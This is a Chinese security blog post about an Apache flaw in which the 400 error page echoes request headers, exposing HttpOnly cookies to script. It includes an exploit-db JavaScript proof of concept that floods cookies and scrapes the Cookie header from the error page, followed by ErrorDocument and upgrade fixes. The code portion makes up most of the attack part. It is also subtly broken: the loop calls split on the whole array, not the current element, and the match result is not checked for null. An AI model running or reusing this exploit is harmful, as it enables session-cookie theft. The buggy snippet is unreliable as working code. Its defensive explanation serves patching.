很多程序以及一些商业或成熟开源的 CMS 文章系统,为了防止 XSS 盗取用户 cookie,一般都会给 cookie 加上 HttpOnly 属性,禁止直接用 JS 读取用户的 cookie,从而降低 XSS 的危害;而下面这个问题刚好可以用来绕过 cookie 的 HttpOnly 属性。

用 Chrome 打开一个站点,按 F12 打开开发者工具,切到 Console,输入如下代码并回车:

// http://www.exploit-db.com/exploits/18442
// Writes ten cookies named xss0..xss9 through document.cookie, each carrying a
// value of 819 "x" characters; when `good` is truthy the same ten cookies are
// instead re-written with an expiry in the past so the browser drops them again.
// NOTE(review): the padding is presumably sized so that the Cookie header of the
// next request exceeds the server's header limit and provokes the 400 error page
// described in the text above — that mechanism is not verifiable from this block.
function setCookies(good) {
  // new Array(820).join("x") yields exactly 819 "x" characters
  var padding = new Array(820).join("x");
  for (var n = 0; n < 10; n++) {
    var name = "xss" + n;
    var value;
    if (good) {
      // Expiry one millisecond in the past removes the cookie
      var pastDate = new Date(+new Date() - 1).toUTCString();
      value = name + "=;expires=" + pastDate + "; path=/;";
    } else {
      value = name + "=" + padding + ";path=/";
    }
    document.cookie = value;
  }
}
// Sets the padded xss* cookies, issues a GET for "/" and, if the server answers
// with status 400, pulls the text of the error page's <pre> block — on the
// affected servers this is the echoed request headers, i.e. the Cookie header
// that HttpOnly was supposed to keep away from script. From the defender's side
// the lesson is simply that an error page must never echo request headers.
function makeRequest() {
  setCookies();

  var xhr = new XMLHttpRequest();

  // readystatechange handler; reads `xhr` from the enclosing scope
  function parseCookies() {
    var cookie_dict = {};
    // Ignore every state change except a finished 400 response
    if (xhr.readyState !== 4 || xhr.status !== 400) {
      return;
    }
    // Flatten the body so the <pre> block can be matched in one expression
    var flat = xhr.responseText.replace(/\r|\n/g, '');
    var content = flat.match(/<pre>(.+)<\/pre>/);
    if (content.length) {
      // Drop the "Cookie: " prefix and the padding cookies, then split on ";"
      content = content[1].replace("Cookie: ", "");
      var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
      // Intended to collect name=value pairs into cookie_dict
      for (var k = 0; k < cookies.length; k++) {
        var s_c = cookies.split('=', 2);
        cookie_dict[s_c[0]] = s_c[1];
      }
    }
    // Expire the padding cookies again before reporting
    setCookies(true);
    alert(JSON.stringify(cookie_dict));
  }

  xhr.onreadystatechange = parseCookies;
  xhr.open("GET", "/", true);
  xhr.send(null);
}
// Entry point: runs once when the snippet is pasted into the console
makeRequest();

你就能看见一个 400 错误响应,其中包含着请求头里的 cookie 信息(包括加了 HttpOnly 的 cookie)。

下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

修复方案:

Apache 官方提供 4 种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:

In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message 输出一个简单生硬的错误信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部 URL

经测试,对于 400 错误只有方法 2 有效,返回包不会再包含 cookie 内容。

Apache 配置:

ErrorDocument 400 "security test"
当然,升级 Apache 到最新(已修复此问题的)版本也可以,而且这才是根本的修复;ErrorDocument 的方法只是让错误页不再回显请求头而已 :)。

参考:http://httpd.apache.org/security/vulnerabilities_22.html
